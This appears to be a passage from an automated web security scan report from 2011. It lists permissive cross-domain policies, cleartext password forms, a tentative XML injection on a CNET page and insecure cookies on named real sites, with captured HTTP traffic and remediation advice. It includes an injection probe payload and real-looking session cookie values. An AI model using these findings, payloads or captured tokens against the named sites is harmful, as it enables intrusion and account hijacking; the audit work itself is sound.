<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.powervideosuite.com" />
...[SNIP]...
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
<allow-access-from domain="212.86.251.190"/>
...[SNIP]...
<allow-access-from domain="*.crunchyroll.com" />
...[SNIP]...
<allow-access-from domain="*.techmatter.com" />
...[SNIP]...
<allow-access-from domain="*.amazon.com" />
...[SNIP]...
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.attributor.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.blinkx.com" />
<allow-access-from domain="*.boxee.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.buddytv.com" />
<allow-access-from domain="*.cbsmobile.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.comcast.com" />
<allow-access-from domain="*.comcastnet.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.et.com" />
<allow-access-from domain="*.fanpop.com" />
<allow-access-from domain="*.freestream.com" />
<allow-access-from domain="*.fuhu.com" />
<allow-access-from domain="*.gotuit.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.harpers.com" />
<allow-access-from domain="*.hp.com" />
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.iwidget.com" />
<allow-access-from domain="*.joost.com" />
<allow-access-from domain="*.meevee.com" />
<allow-access-from domain="*.metacafe.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnsearch.com" />
<allow-access-from domain="*.netflix.com" />
<allow-access-from domain="*.radio.com" />
<allow-access-from domain="*.sands.com" />
<allow-access-from domain="*.showtime.com" />
<allow-access-from domain="*.slide.com" />
<allow-access-from domain="*.sling.com" />
<allow-access-from domain="*.sony.com" />
<allow-access-from domain="*.tidaltv.com" />
<allow-access-from domain="*.transpond.com" />
<allow-access-from domain="*.tvguide.com" />
<allow-access-from domain="*.tvstations.com" />
<allow-access-from domain="*.veoh.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...
<allow-access-from domain="*.bing.com" />
...[SNIP]...
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.fancast.com" />
<allow-access-from domain="*.blinx.com" />
<allow-access-from domain="apps.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ustream.tv"/>
...[SNIP]...
<allow-access-from domain="*.sho.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net"/>
...[SNIP]...
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ooyala.com"/>
...[SNIP]...
<allow-access-from domain="*.yldmgrimg.net"/>
...[SNIP]...
<allow-access-from domain="*.cstv.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com"/>
...[SNIP]...
<allow-access-from domain="*.maxpreps.com.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.livestream.com"/>
...[SNIP]...
<allow-access-from domain="*.justin.tv"/>
...[SNIP]...

4.8. http://www.walmart.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.walmart.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15
Last-Modified: Fri, 19 Jun 2009 00:03:46 GMT
ETag: "11b9b-137-46ca84217bc80"
Cache-Control: max-age=7200
Expires: Wed, 12 Jan 2011 17:26:34 GMT
Content-Type: application/xml
Date: Wed, 12 Jan 2011 15:26:34 GMT
Content-Length: 311
Connection: close
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff0907974245525d5f4f58455e445a4a423660;path=/
Set-Cookie: dcenv=edc; path=/; domain=walmart.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.walmart.com" />
<allow-access-from domain="*.richfx.com" />
<allow-access-from domain="*.edgesuite.net" />
...[SNIP]...

4.9. http://www.washingtonpost.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washingtonpost.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.1 200 OK
Server: Web Server
Date: Wed, 12 Jan 2011 15:26:41 GMT
Cache-control: max-age=60
Expires: Wed, 12 Jan 2011 15:27:41 GMT
Content-type: text/xml
Last-modified: Thu, 08 Apr 2010 15:51:21 GMT
Content-length: 478
Etag: "1de-4bbdfb79"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com" />
<allow-access-from domain="admin.brightcove.com" />
<allow-access-from domain="*.newsweek.com"/>
<allow-access-from domain="*.digitalink.com"/>
<allow-access-from domain="*.slate.com"/>
<allow-access-from domain="livingstories.googlelabs.com" />
...[SNIP]...

5. Silverlight cross-domain policy previous next
There are 3 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://ad.uk.doubleclick.net/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Wed, 12 Jan 2011 03:00:27 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ad.uk.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.uk.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.uk.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 14:50:55 GMT
Date: Wed, 12 Jan 2011 03:00:28 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Thu, 13 Jan 2011 03:00:25 GMT
Date: Wed, 12 Jan 2011 03:00:25 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6. Cleartext submission of password previous next
There are 10 instances of this issue:

http://account.theregister.co.uk/register/
http://digg.com/submit
http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/
http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/
http://lists.arin.net/mailman/listinfo/arin-whoisrws
http://whitepapers.theregister.co.uk/
http://whitepapers.theregister.co.uk/search/
http://www.43things.com/person/
http://www.sentinelinvestments.com/advisor-login
http://www.tukaiz.com/index.php

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

6.1. http://account.theregister.co.uk/register/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://account.theregister.co.uk
Path:	/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://account.theregister.co.uk/register/

The form contains the following password fields:

password
confirm_password

Request

GET /register/ HTTP/1.1
Host: account.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:12:21 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 30609

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</h2>

<form action="http://account.theregister.co.uk/register/" method="post" id="acc-edit">
<input type="hidden" name="product" value="theregister_newsletter">
...[SNIP]...
<td><input type="password" name="password" value="" size="30"></td>
...[SNIP]...
<td><input type="password" name="confirm_password" value="" size="30"></td>
...[SNIP]...

6.2. http://digg.com/submit previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/submit

The form contains the following password field:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:34:26 GMT; path=/; domain=digg.com
Set-Cookie: d=2d42bedfcbae53b8ee6f61a9c9010100cced8e8e45672361cf74370761950c78; expires=Mon, 11-Jan-2021 13:42:06 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22051 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7384

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

6.3. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forums.theregister.co.uk
Path:	/forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forums.theregister.co.uk/post/submit/2011/01/07/open_source_crypto_curbs/

The form contains the following password field:

password

Request

GET /forum/1/2011/01/07/open_source_crypto_curbs/ HTTP/1.1
Host: forums.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 46429

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
</div>

<form method=POST action="http://forums.theregister.co.uk/post/submit/2011/01/07/open_source_crypto_curbs/" class=box id=comment-form name=comment-form>

<h3>
...[SNIP]...
<div><input name=password type=password></div>
...[SNIP]...

6.4. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forums.theregister.co.uk
Path:	/forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://account.theregister.co.uk/login/

The form contains the following password field:

password

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 46429

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
</p>
<form method=POST action="http://account.theregister.co.uk/login/">
<input type=hidden name=r value="http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/">
...[SNIP]...
</span>
<input class=text type=password name=password></label>
...[SNIP]...

6.5. http://lists.arin.net/mailman/listinfo/arin-whoisrws previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lists.arin.net
Path:	/mailman/listinfo/arin-whoisrws

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://lists.arin.net/mailman/subscribe/arin-whoisrws

The form contains the following password fields:

pw
pw-conf

Request

GET /mailman/listinfo/arin-whoisrws HTTP/1.1
Host: lists.arin.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:59 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=us-ascii
Content-Length: 12065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!--
...[SNIP]...
<fieldset class="standard">
<FORM Method=POST ACTION="../subscribe/arin-whoisrws">

<h3 class="mail_h3">
...[SNIP]...
</label>
<INPUT type="Password" name="pw" size="15"></li>
...[SNIP]...
</label>
<INPUT type="Password" name="pw-conf" size="15"></li>
...[SNIP]...

6.6. http://whitepapers.theregister.co.uk/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://whitepapers.theregister.co.uk
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://account.theregister.co.uk/login/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: whitepapers.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:07:34 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 34233

<!DOCTYPE html>
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Whitepapers and tech resources from The Register</title>
<link rel="stylesheet" href="/
...[SNIP]...
</div>

<form action="http://account.theregister.co.uk/login/" method="post" id="Login">
<input type=hidden name=r value="http://whitepapers.theregister.co.uk/">
...[SNIP]...
<td><input type="password" name="password" class="Text" tabindex="4"></td>
...[SNIP]...

6.7. http://whitepapers.theregister.co.uk/search/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://whitepapers.theregister.co.uk
Path:	/search/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://account.theregister.co.uk/login/

The form contains the following password field:

password

Request

GET /search/ HTTP/1.1
Host: whitepapers.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:07:35 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 24426

<!DOCTYPE html>
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Search for ...... ... Reg Whitepapers</title>
<link rel="stylesheet" href="/style_picke
...[SNIP]...
</div>

<form action="http://account.theregister.co.uk/login/" method="post" id="Login">
<input type=hidden name=r value="http://whitepapers.theregister.co.uk/search/">
...[SNIP]...
<td><input type="password" name="password" class="Text" tabindex="4"></td>
...[SNIP]...

6.8. http://www.43things.com/person/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.43things.com
Path:	/person/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.43things.com/auth/login

The form contains the following password field:

person[password]

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:08:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 0.01017
Cache-Control: no-cache
Set-Cookie: ubid=SV2zpKsaoTKvCsQCCVAPEBCrBaA%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: auth=pnAiy5OTmH8VYlJnGjHyFoBpPvpc4DPnYbLKjnQeNv9Q7ss4zO9i2gGP8aKM5xF9EY9nas978c%2BQyCXn8qgOvWb28tIflxH1k8TKgw8KLZE%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _session_id=29d6c53e1159bfde1f23b713b0b5d77e; domain=.43things.com; path=/
Content-Length: 13962
Status: 404 Not Found
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 13:08:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>43 Things</title>
<m
...[SNIP]...
</div>

<form name="existingAccount" action="/auth/login" method="post" onsubmit="new Ajax.Updater('overlay', '/auth/loginjs', {asynchronous:true, evalScripts:true, onLoading:function(request){ajax_status('loadingmsg','<img src=/images/icons/indicator.gif align=middle>', 'replace')}, parameters:Form.serialize(this)}); return false;">

<table class="login-form">
...[SNIP]...
<td align="left" style="background:url('http://acf.43things.com/images/nav/login_input_background.gif') no-repeat left top; width:299px;"><input class="login-input" id="person_password" name="person[password]" size="30" type="password" /></td>
...[SNIP]...

6.9. http://www.sentinelinvestments.com/advisor-login previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sentinelinvestments.com
Path:	/advisor-login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.sentinelinvestments.com/inc/form_scripts/advisor_login_script.php

The form contains the following password field:

password

Request

GET /advisor-login HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:03:18 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
   <l
...[SNIP]...
</DIV>

       <form method="post" action="/inc/form_scripts/advisor_login_script.php">

       <DIV ID="advisor_login_topleft_form_email">
...[SNIP]...
<DIV ID="advisor_login_topleft_form_password">Password:
<input name="password" id="password" type="password" value="" /></DIV>
...[SNIP]...

6.10. http://www.tukaiz.com/index.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tukaiz.com
Path:	/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.tukaiz.com/index.php

The form contains the following password field:

passwd

Request

GET /index.php HTTP/1.1
Host: www.tukaiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.2.1
Set-Cookie: fc0fc83ec7006e5c547094008560a464=-; path=/
Date: Wed, 12 Jan 2011 05:01:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
</h3>
                   <form action="http://www.tukaiz.com/index.php" method="post" name="login" >

   <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
...[SNIP]...
<br />
           <input type="password" id="mod_login_password" name="passwd" class="inputbox" size="10" alt="password" />
           <br />
...[SNIP]...

7. XML injection previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://download.cnet.com
Path:	/8300-2007_4-12.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.

Request

GET /8300-2007_4-12.html]]>> HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:45:50 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app6.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 03:51:50 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:15:50 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:45:50 GMT
Set-Cookie: arrowLat=1294803950489; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:45:50 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 03:45:50 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:45:50 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:46:50 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:45:55 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:46:50 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=962
Connection: Keep-Alive
Content-Length: 105058

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>

<title>Software news, tips an
...[SNIP]...
<p>Click this link to view as XML.</p>
...[SNIP]...

8. SSL cookie without secure flag set previous next
There are 21 instances of this issue:

/webapp/wcs/stores/servlet/Subscriptions_Allure
/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest
/webapp/wcs/stores/servlet/Subscriptions_BonAppetite
/webapp/wcs/stores/servlet/Subscriptions_Brides
/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio
/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler
/webapp/wcs/stores/servlet/Subscriptions_Details
/webapp/wcs/stores/servlet/Subscriptions_ElegantBride
/webapp/wcs/stores/servlet/Subscriptions_GQ
/webapp/wcs/stores/servlet/Subscriptions_Glamour
/webapp/wcs/stores/servlet/Subscriptions_GolfDigest
/webapp/wcs/stores/servlet/Subscriptions_GolfWorld
/webapp/wcs/stores/servlet/Subscriptions_Lucky
/webapp/wcs/stores/servlet/Subscriptions_ModernBride
/webapp/wcs/stores/servlet/Subscriptions_NewYorker
/webapp/wcs/stores/servlet/Subscriptions_Self
/webapp/wcs/stores/servlet/Subscriptions_TeenVogue
/webapp/wcs/stores/servlet/Subscriptions_VanityFair
/webapp/wcs/stores/servlet/Subscriptions_Vogue
/webapp/wcs/stores/servlet/Subscriptions_W
/webapp/wcs/stores/servlet/Subscriptions_Wired

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

